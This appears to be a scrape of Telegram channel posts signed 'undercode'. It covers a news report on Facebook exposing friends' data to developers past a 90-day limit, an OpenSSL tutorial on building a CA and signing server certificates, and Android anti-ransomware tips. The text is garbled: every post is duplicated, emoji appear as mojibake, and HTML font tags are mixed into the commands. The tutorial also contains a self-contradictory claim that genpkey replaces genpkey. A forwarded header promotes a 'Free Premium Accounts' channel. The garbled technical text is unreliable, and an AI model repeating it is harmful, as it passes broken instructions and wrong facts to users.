> But Facebook said in a blog post on Wednesday that this rule has not been implemented smoothly in some cases. If the user also contacts Facebook friends through the application, the developer can obtain the data of the two users at the same time. However, a company spokesperson said that the vulnerability would cause developers to see the data of a userβs friends when they get the data of an active user, even if the latter has not opened the application for more than 90 days.
> Facebook revealed that this issue involves about 5,000 developers. But they did not disclose the number of users who might be affected by this.
> "We will solve the problem after we find it," Facebook wrote in the blog post. "We will continue to investigate and will continue to maintain transparency around any major updates."
> The vulnerability was discovered by a Facebook engineer two weeks ago, but the company said that they have no reason to believe that the relevant data has been misused.
written by undercode
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Facebook re-exposed vulnerability: sharing user data with developers overtime
> Sina Technology News Beijing time on July 2 morning news, after the "Cambridge Analysis Scandal" was exposed, FacebookThere was a promise to impose a time limit when sharing user data with external developers, but the actual deadline exceeded their original promise.
> The company previously stated that if the user does not interact with the developer for more than 90 days, it will prevent the application from obtaining user data. At that time, developers need to re-acquire permission to get access to data such as e-mail, birthday and city,
> But Facebook said in a blog post on Wednesday that this rule has not been implemented smoothly in some cases. If the user also contacts Facebook friends through the application, the developer can obtain the data of the two users at the same time. However, a company spokesperson said that the vulnerability would cause developers to see the data of a userβs friends when they get the data of an active user, even if the latter has not opened the application for more than 90 days.
> Facebook revealed that this issue involves about 5,000 developers. But they did not disclose the number of users who might be affected by this.
> "We will solve the problem after we find it," Facebook wrote in the blog post. "We will continue to investigate and will continue to maintain transparency around any major updates."
> The vulnerability was discovered by a Facebook engineer two weeks ago, but the company said that they have no reason to believe that the relevant data has been misused.
written by undercode
β β β Uππ»βΊπ«6π¬πβ β β β
Forwarded from Free Premium Accounts Telegram Channel - Netflix - Spotify
Please open Telegram to view this post
VIEW IN TELEGRAM
β β β Uππ»βΊπ«6π¬πβ β β β
π¦How to generate certificates in OpenSSL ?
#Pro
In fact, the private key of the web server and the private key of the Certification Authority (CA) are no different in nature - they are generated by the same command. But a Certification Authority (CA) has a special status insofar as:
1οΈβ£Its private key is used for signing certificates (therefore, it is called the root, although in the physical sense it does not differ from the private key of the server)
2οΈβ£Its public key (certificate) is added to the computers of all users as a trusted
3οΈβ£The digital signature in the certificate is not intended to be verified by a third party, since the certificate is self-signed.
> The only difference between a self-signed certificate from a Certification Authority (CA) and one that you can generate yourself is that it is located among trusted ones (in the operating system or in the browser).
> You can place a self-created self-signed certificate among trusted ones, and it will have exactly the same strength as the root certificate from Certificate Authority (CA)
π¦ Let us return to the procedure of signing, but actually creating a server certificate - the created certificate must be cryptographically associated with the serverβs private key. But the private key should be known exclusively to its owner (server). The way out of this situation is the use of the already mentioned Certificate Signing Request (CSR), that is, a "certificate signing request". That is, the Public Key and the domain name are transferred to the Certification Authority, but the private key remains secret. This is precisely the meaning of the existence of CSR.
1) For educational purposes, you can create your own root keys and even your βCertificate Authority (CA)β. Then create a pair of private and public server keys. Using the server key, we will create a certificate signing request (CSR). With a private key CA we will sign (create) a certificate for the server.
2) We will also learn how to add our root certificate to trusted certificates, verify and manage trusted certificates already present.
3) Which command to use, genpkey or generate :
There are two commands in the OpenSSL package that perform a very similar action - they generate a RSA private-public key pair:
1οΈβ£<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">openssl genpkey -algorithm RSA</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
2οΈβ£openssl genrsa</font></font>
4) In fact, the formats of the keys generated by these RSA programs are slightly different. The genpkey command replaces the genpkey command , as well as two more commands: gendh and gendsa .
5) That is, you need to use genpkey with which you need to specify the key algorithm with the -algorithm option .
ENJOYβ€οΈππ»
Written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦How to generate certificates in OpenSSL ?
#Pro
In fact, the private key of the web server and the private key of the Certification Authority (CA) are no different in nature - they are generated by the same command. But a Certification Authority (CA) has a special status insofar as:
1οΈβ£Its private key is used for signing certificates (therefore, it is called the root, although in the physical sense it does not differ from the private key of the server)
2οΈβ£Its public key (certificate) is added to the computers of all users as a trusted
3οΈβ£The digital signature in the certificate is not intended to be verified by a third party, since the certificate is self-signed.
> The only difference between a self-signed certificate from a Certification Authority (CA) and one that you can generate yourself is that it is located among trusted ones (in the operating system or in the browser).
> You can place a self-created self-signed certificate among trusted ones, and it will have exactly the same strength as the root certificate from Certificate Authority (CA)
π¦ Let us return to the procedure of signing, but actually creating a server certificate - the created certificate must be cryptographically associated with the serverβs private key. But the private key should be known exclusively to its owner (server). The way out of this situation is the use of the already mentioned Certificate Signing Request (CSR), that is, a "certificate signing request". That is, the Public Key and the domain name are transferred to the Certification Authority, but the private key remains secret. This is precisely the meaning of the existence of CSR.
1) For educational purposes, you can create your own root keys and even your βCertificate Authority (CA)β. Then create a pair of private and public server keys. Using the server key, we will create a certificate signing request (CSR). With a private key CA we will sign (create) a certificate for the server.
2) We will also learn how to add our root certificate to trusted certificates, verify and manage trusted certificates already present.
3) Which command to use, genpkey or generate :
There are two commands in the OpenSSL package that perform a very similar action - they generate a RSA private-public key pair:
1οΈβ£<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">openssl genpkey -algorithm RSA</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
2οΈβ£openssl genrsa</font></font>
4) In fact, the formats of the keys generated by these RSA programs are slightly different. The genpkey command replaces the genpkey command , as well as two more commands: gendh and gendsa .
5) That is, you need to use genpkey with which you need to specify the key algorithm with the -algorithm option .
ENJOYβ€οΈππ»
Written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Some Steps for protect your android from Ransomware :
#fastTips
How to protect yourself?
> We recommend that you take basic precautions to protect yourself from these threats:
1) Never open email attachments from unknown senders- also scan any usb plugged in
2) Never click on links in SMS or MMS messages.
3) Even if the letter looks normal from some company ,.
4) Go to Settings β Security and disable "allow installation of applications from sources other than Google Play."
5) We do not recommend connecting to unknown Wi-Fi networks and turn off Wi-Fi when not in use.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Some Steps for protect your android from Ransomware :
#fastTips
How to protect yourself?
> We recommend that you take basic precautions to protect yourself from these threats:
1) Never open email attachments from unknown senders- also scan any usb plugged in
2) Never click on links in SMS or MMS messages.
3) Even if the letter looks normal from some company ,.
4) Go to Settings β Security and disable "allow installation of applications from sources other than Google Play."
5) We do not recommend connecting to unknown Wi-Fi networks and turn off Wi-Fi when not in use.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β